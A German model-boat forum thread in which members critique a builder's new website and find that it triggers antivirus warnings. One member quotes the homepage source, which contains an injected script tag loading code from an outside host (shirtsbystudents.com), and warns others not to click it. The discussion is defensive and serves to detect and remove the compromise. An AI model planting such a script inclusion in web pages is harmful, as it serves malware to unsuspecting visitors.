PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Haempus neue website



Cervelo
12.March.2010, 17:30
Heute darf ich die neue Homepage vom Haempu
präsentieren. Die bisherige Homepage ist einfach schon ein wenig veraltet, deshalb war etwas Neues wohl schon
eine Weile überfällig. Hier der Link zur neuen Website:



www.hpr-powerboats.ch (http://www.hpr-powerboats.ch/)



Ich wünsche auch im Namen vom Haempu viel Spaß beim durchstöbern der Homepage, wir hoffen es gefällt euch!
Gruß Christian

Sprite4Colalight
12.March.2010, 17:41
Die Seite ist ja ganz net, aber der Ton ist schlimm...

PS:

Ich schick euch morgen die Schablone zurück.

Mikey
12.March.2010, 17:47
Hallo,

Das Turbinenpfeifen ist wirklich hässlich! Ansonsten schick!

Gruss Michael

DJ_Kimmekk
12.March.2010, 18:14
Da muss ich euch zustimmen.
Die Website ist wirklich gut aber das Turbinenpfeifen muss wirklich wieder raudgenommen werden.

Gruß Kim

steich
12.March.2010, 19:39
hallo


Traumboote vielleicht geht es ja mal in erfüllung aber solange habe ich den youtube link hpr powerboat zu meinen favoriten und werd immer wieder sehen was für neue videos diese klasse boote reinkommen.


mfg robert


" Der Herr sei gnädig, mit allen die übers Wasser fahren.
könnten wir laufen bräuchten wir kein Bergeboot"

Jan-Nicolas
12.March.2010, 20:55
Ich gebe mich da mal ganz offen und unverfälscht ...

- Das Turbinenpfeifen geht garnicht.
- Die Website findet mitnichten mein Gefallen ... zu "oldschool", zu viele Frames, zu viel Java, kein "Corporate Design". Das ganze sieht aus wie mit einem Homepagebaukasten zusammengestellt. (Flatternde Flaggen als "animated .gifs" gehen schonmal garnicht !) ... "Button-generator Werbung im "Kontakt". Sorry, aber auch das geht garnicht.

Wirklich "professionell" sieht einfach anders aus.
Angesichts der tollen Rümpfe hätte die Page etwas anderes verdient.

wie gesagt : Meine Meinung !

Ich bin jetzt auch nicht der "Designer vor dem Herrn". Wenn ich aber diese Seite zum Beispiel gegen der Relaunch von der Lehner-Site halte, weiss ich ganz genau, wer da mein Favorit ist !

JN

Hans
12.March.2010, 21:36
Hmm, über Geschmack soll man ja nicht streiten. Deshalb sag ich mal besser nichts dazu. :o
Wenn allerdings nicht einmal die rechtlichen Dinge beachtet werden, lockt das potentiell Missgünstige auf den Plan.

Hanspeter, wir sollten mal telefonieren, bevor da was anbrennt.... ;)
Nummer hast Du ja.

Gruß Hans

spongebob31
13.March.2010, 19:49
Schade bei mir zeigt es sofort an,das ein Trojaner geladen wird beim öffnen der Seite :-(

Bin wohl der einzigste mit Kaspersky:doh:

Gruss Stephan

Hans
13.March.2010, 20:06
Wenn f-prot vor einem Trojaner warnt, nennt es auch den Namen.
Mach doch mal einen screenshot von der Meldung.

Gruß Hans

spongebob31
13.March.2010, 20:18
So schaut das dann aus!:confused:

Ups bisschen klein hier!

dudu
13.March.2010, 20:36
Hey

Bei mir mit dem AVG siehts so aus

Schönen Abend noch

S. Hänni

(die Meldung kam jedoch nicht immer. Vorgestern als ich drauf war kam keine Meldung)

Hans
13.March.2010, 21:13
Habe Haempu angerufen. Manuel sollte die Seite erst einmal vom Netz nehmen und nochmals durchchecken.
Der Hinweis von Hänni zeigt ja auch, wonach man suchen muss.

Gruß Hans

Jan-Nicolas
13.March.2010, 21:50
Eigentlich hatte ich mir strikt vorgenommen, zu dieser Site nichts mehr zu sagen - einfach weil ich dem Haempu nicht "ans Bein pinkeln" möchte. Jetzt allerdings kann ich nicht anders, weil ich praktisch unaufgefordert darin bestätigt wurde, daß in einem einfachen CMS Java (oder JavaScript) eben einfach nichts zu suchen hat ! Insbesondere dann, wenn es sich (wie vermutlich hier) um eine relativ statische Site handelt - oder besteht hier der Bedarf daß sich das Menü dynamisch an die Webinhalte anpasst, weil die so oft wechseln oder upgedated werden ?

Sorry, aber es gibt einige ungeschriebene Gesetze beim Websitebau, die man unbedingt einhalten sollte. JavaScript hat nichts, aber auch gar nichts auf einer solchen Site zu suchen - erst recht nicht um ein lapidares Menü zu designen, das man auch mit HTML, XHTML oder Ajax designen kann ... ohne daß irgendwelche Virenscanner anschlagen.
Das Ergebnis sieht man ja : Praktisch jeder, der mit einer Virenschutzlösung unter Win auf die Site zugreift, bekommt den oben dargestellten Hinweis. Wo ist das Script her ? Hat es hier mal einen Code-Review gegeben ?

Sorry, aber schneller kann man den guten Ruf eines Unternehmens nicht zerstören. Ich kann nur hoffen, daß noch ein Backup der ursprünglichen Site existiert.

JN

Hans
13.March.2010, 22:25
Teil der Startseite:

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>index</title>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<frameset framespacing="0" border="0" rows="175,*" frameborder="0">
<noframes>
<script src=http://shirtsbystudents.com/elgg/favicon.php ></script><body> (Link NICHT anklicken!)
und hier Erklärungen dazu: Klick (http://google.com/safebrowsing/diagnostic?site=shirtsbystudents.com/) :rolleyes:

Gruß Hans

Jan-Nicolas
13.March.2010, 22:45
... und den hier "www.stats4free.de" (im quelltext) liefere ich dann auch auch nach :
http://www.bedarfshaltestelle.de/netzsperren/

JN

Hans
13.March.2010, 23:04
Allerdings erstaunlich, wie wenige eine Fehlermeldung bekommen. :confused:
Alle kein AV aktiviert - oder Norton? :laugh:

Stephan, wenn Kasperky auch ein Performance-Killer ist, what shalls? Er funktioniert. ;)

Hänni, die Meldung muss auch nicht immer kommen (bei mir auch nicht), aber im Protokoll kann ich nachlesen, dass Panda-AV aufgepasst hat.
Schau mal bei Dir unter "Berichte" nach. ;)


Gruß Hans

Haempu
13.March.2010, 23:04
hallo

sorry tut mir leid dass da scheinbar was nicht in ordnung ist.
hans, jan leider habe ich keine ahnung wovon ihr hier schreibt:confused::confused:
ich kriege es grade so auf die reihe ein boot zu machen, aber von
webseiten habe ich mehr als null ahnung.

die alte läuft noch www.swissmodelpowerboatteam.ch (http://www.swissmodelpowerboatteam.ch)

gruss haempu

Alexanderdiem
13.March.2010, 23:08
Nutze Avast und bekomme keine meldung

Hans
13.March.2010, 23:15
ich kriege es grade so auf die reihe ein boot zu machen...
:klop: Understatement pur ! :klop:

Wenn ich Lotto spielen könnte, wie Du Boote machst, würde ich Europa aufkaufen. :D Alle Seen zuerst! :laugh:

Gruß Hans

Michael1994
13.March.2010, 23:20
Hallo,

ich benutze antivir free, und bekomme auch nichts.

allerdings gefällt mir die neue Seite nicht wirklich. Ich muss es wirklich so sagen. Die alte sah einiges besser aus, professioneller, einheitlicher. Soll keineswegs die arbeit des programmieres der neuen seite zunichte machen, aber ich denke, wenn man die alte seite inhaltlich überarbeitet, sähe das m.M nach besser aus...

Ultraviolet
13.March.2010, 23:45
OT



Sorry, aber es gibt einige ungeschriebene Gesetze beim Websitebau, die man unbedingt einhalten sollte. ...
JN

:D Ja die gibt es...

Siehe:
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">

Einfach was zusammenklicken ist wahrlich nicht mehr "zeitgemäß".
Das Layout erinnert mich etwas an amerikanische "Homepages"...
(okay, der war fies.)



...JavaScript hat nichts, aber auch gar nichts auf einer solchen Site zu suchen -(...) oder Ajax designen kann ... ...JN

;) Ajax ist doch JavaSript...
/OT

Das bischen CSS-Gefummel per JS das für das Drop-down Menü nötig wäre, erklärt nicht die Hektik der Viren-Guards...
Da hat wohl jemand einfach eine Scriptdatei eingebunden, ohne zu wissen was er da eigentlich macht. Strg+C lässt grüßen...
Wenn ich mir die Page genauer anschaue, scheint das auch für vieles andere zu gelten. Kein Title usw und noch nicht einmal valides Transitional (http://validator.w3.org/check?verbose=1&uri=http%3a%2f%2fwww.hpr-powerboats.ch%2f)...

Der Qualität der Boote wird die Seite leider nicht gerecht.
Schade eigentlich, denn inhaltlich finde ich die Page durchaus aussagekräftig, informativ und alles was man so braucht/wissen sollte/wissen muss findet man auch - sogar wenn man JavaSript deaktiviert hat.
Einfach nochmal drannsetzen. Kein Startup läuft perfekt.

Haempu
14.March.2010, 14:50
hallo

über geschmack lässt sich streiten. manuel hat die seite genau so
gestaltet wie ich es wollte. oldscool eben, oder handgemacht.
ich denke er hat dass ,in betracht der kentnisse die er hat gut gemacht. dass sich da ein paar fehler eingeschlichen haben, dass kann passieren. ich denke in der zwischenzeit ist es ok. ist halt wie
bei einem neuen boot. jetzt kommt die abstimmung:D

danke an alle die konstruktive vorschläge gemacht haben was man
ändern müsste.

gruss haempu

Jan-Nicolas
14.March.2010, 16:19
Nein - über Geschmack lässt sich wahrlich nicht streiten :prost:
Wenn Du es "oldschool" wolltest, hast Du zumindest genau das bekommen, Haempu.

Ich stelle ausserdem fest, daß das Menü jetzt auf einem anderen Code basiert. Ich kann nur hoffen, daß die Virenscanner jetzt ruhe geben.

Aus allem Weiteren halt ich mich an dieser Stelle jetzt raus.
Wenn der Ersteller der Site jedoch Unterstützung oder Hilfe braucht, stehe ich gern per eMail zu Verfügung.

JN

dudu
14.March.2010, 16:30
@JN

Ich war vor ca. 20 minuten auf der Seite und beim öffnen der seite kam gleich der AVAST mit der meldung ich hätte bereits einen Virus eingefangen. Gefunden hat er einen wsocks32.dll im sys32.
Ich persönlich kann damit nichts anfangen, aber villeicht jemand von euch?...

schönen Tag noch

S. Hänni

spongebob31
14.March.2010, 16:42
Hallo!

Also beim öffnen der Startseite schweigt meiner jetzt.Aber folge ich z.B dem Link zur Bildergalerie schlägt er wieder mächtig an.

Gruss Stephan

Hans
14.March.2010, 17:14
Hallo!

Also beim öffnen der Startseite schweigt meiner jetzt.Aber folge ich z.B dem Link zur Bildergalerie schlägt er wieder mächtig an.

Gruss Stephan
Der ist eben gründlich! ;)
Wenn Du dort anklickst, schaue mal, was der Browser machen will.
Da erscheint dann wieder der alte Bekannte "shirtsbystudents". :confused:

Gruß Hans

Ultraviolet
14.March.2010, 17:31
Über das Design ist nicht zu streiten aber die Technik sollte funktionieren.
An der Stelle möchte ich mich der Offerte anschließen und ebenfalls aktive Mitarbeit anbieten und würde ich dem Ersteller der Seite gerne anleitend beistehen.
Was Modellboote betrifft, bin ich der Noob aber ich kann in punkto Webdesign/GFX/CI/SEO etc. den einen oder anderen Tip geben und einiges an Erfahrung vermitteln - sofern gewünscht - bitte per PN.

spongebob31
14.March.2010, 17:44
Der ist eben gründlich! ;)

Ja ja ich habe schon verstanden,Du magst meinen Kaspersky nicht:).

Ich früher auch nicht,aber mittlerweile finde ich ihn Top.Und wenn ich einer grossen Computerzeitschrift glauben kann dann wird er alle 2 Wochen immer wieder Testsieger .

Aber ich merke schon,Du bist wie eine Frau,die stehen auch nicht auf Sachen von der Stange.Du hast schon einen sehr extravaganten Geschmack.Und das sogar bei Virenscannern:D

Gruss Stephan

Hans
14.March.2010, 18:02
Ja ja ich habe schon verstanden,Du magst meinen Kaspersky nicht:).
Oha, Stephan, da verstehst Du mich völlig falsch. Das Gegenteil ist der Fall.

Die Jungs von Kaspersky haben mir bereits 1992 geholfen, als durch einen Spinner in unserem Betrieb etwa 2000 Kunden-PC mit dem Michelangelo-Virus verseucht wurden. Und sie haben kostenlos geholfen.
Kaspersky frisst Performance, doch Gründlichkeit braucht eben mehr Zeit als Oberflächlichkeit. ;)

Gruiß Hans

Solexholland
14.March.2010, 19:14
Ich, als 38jahriges rc-bootsliebhaber, mit 0% know-how von webdesign etc etc, sehe :

ein übersichtliches menu
schöne Bilder
ein preisliste
etc etc

Mehr brauche Ich als Kunde/interessierte NICHT....
Und ne heli-bauer, und in Freizeit bootsbauer, braucht auch nicht mehr um seine rümpfe zu verkaufen....

Mötley Crue&Epoxy vs. Java/.gif/Bits&Bytes ? :-)

mudl
14.March.2010, 19:21
[QUOTE=Solexholland;100979]Ich, als 38jahriges rc-bootsliebhaber, mit 0% know-how von webdesign etc etc, sehe :

ein übersichtliches menu
schöne Bilder
ein preisliste
etc etc

Mehr brauche Ich als Kunde/interessierte NICHT....
Und ne heli-bauer, und in Freizeit bootsbauer, braucht auch nicht mehr um seine rümpfe zu verkaufen....

:thx:
Genau so sehe ich das auch
Aber anscheinend gibts wirklich nur noch perfekte Menschen auf der Welt :doh:
Und übrigens hab keinerlei Fehlermeldungen wenn ich die seite öffne

servus
mudl

Solexholland
14.March.2010, 20:14
Mudl.

fehlermeldung ? Wass ist dass ?
Mit nur Windows I.E 7 und ne SesamstraBe virusscanner
auf meine oldskool laptop hab Ich kaum probleme.
In Holland sagen wir : wass wir nicht wissen, schadet uns auch nicht :)

Doc DG
14.March.2010, 20:24
ein übersichtliches menu
schöne Bilder
ein preisliste
etc etc

Mehr brauche Ich als Kunde/interessierte NICHT....
Und ne heli-bauer, und in Freizeit bootsbauer, braucht auch nicht mehr um seine rümpfe zu verkaufen....

Mötley Crue&Epoxy vs. Java/.gif/Bits&Bytes ? :-)

:hi5: Genau, man soll ja auch nicht das Layout kaufen sondern die schönen Boote.
Und zumindest gibt es dort nur Orginale Rümpfe und keine umgenannten Uraltmodelle.:D

Was die Fehlermeldung angeht. Ich hab´s jetzt paar mal probiert, mit mehreren Rechner und alles läuft sauber.

Und wer mit Avira Schützt ist eh Lebensmüde. Habe drei mal die Woche mit Kunden zu tun die SPAREN wollten.

Aber Egal:D


@Haempu: Solange die Boot so perfekt gebaut werden wie immer, ist es mir Scheiss egal wie die Seite aussieht.Und so schlimm ist es ja auch nu wieder nicht.

Hans
14.March.2010, 20:25
Aber anscheinend gibts wirklich nur noch perfekte Menschen auf der Welt :doh:
Man muss nicht perfekt sein, um andere vor einem Trojaner zu warnen, der nachweislich vorhanden ist, von mehreren AV-Testsiegern auch erkannt und von Google als solcher bestätigt wurde.


Und übrigens hab keinerlei Fehlermeldungen wenn ich die seite öffne
Man muss aber verdammt dreist und überheblich sein, um zu unterstellen, dass alle anderen das erfunden hätten.

Bisher habe ich alles per Email besprochen - und Manuel hat ausnahmslos alle Punkte umgesetzt, einige davon auch schon kurz zuvor selbst erkannt.

Was soll jetzt diese öffentliche Provokation? Passt es nicht in Dein vorgefasstes Feindbild, dass von allen Seiten Hilfe angeboten wird?

Ob die Hilfsangebote weiterhin bestehen, weiß ich nicht. Das müsste dann allerdings per PN oder Email geklärt werden.

Den Thread schließe ich, weil ich es unerträglich finde, hilfsbereiten Leuten Manipulation zu unterstellen und sie derart überheblich anzugehen.

Hans